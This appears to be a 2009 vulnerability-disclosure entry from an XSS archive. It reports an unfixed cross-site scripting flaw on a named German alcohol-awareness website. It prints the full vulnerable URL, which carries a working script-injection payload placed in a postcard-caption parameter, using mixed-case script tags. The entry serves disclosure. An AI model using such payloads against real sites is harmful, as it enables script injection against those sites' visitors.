Unfixed XSS vulnerability at www.bist-du-staerker-als-alkohol.de

2009-08-04T00:00:00
ID XSSED:59427
Type xssed
Reporter thejanky
Modified 2009-06-30T00:00:00

Description

Security researcher thejanky, has submitted on 08/04/2009 a cross-site-scripting (XSS) vulnerability affecting www.bist-du-staerker-als-alkohol.de, which at the time of submission ranked 879366 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 30/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.bist-du-staerker-als-alkohol.de/index.php?id=46&tx_srsendcard_pi1[cmd]=prompt&tx_srsendcard_pi1[card_caption]=<scrIpt>alert('BIER')</scRiPT>NA TOLL! - Postkarte%26quot%3BHose%26quot%3B&tx_srsendcard_pi1[cardaltText]=NA TOLL! - Postkarte%26quot%3BHose%26quot%3B&tx_srsendcard_pi1[card_image]=HoseSchild.jpg&tx_srsendcard_pi1[card_image_path]=uploads%2Ftx_srsendcard%2F&tx_srsendcard_pi1[image_width]=417&tx_srsendcard_pi1[image_height]=572&tx_srsendcard_pi1[selection_image]=&tx_srsendcard_pi1[selection_image_width]=0&tx_srsendcard_pi1[selection_image_height]=0&tx_srsendcard_pi1[selection_imagealtText]=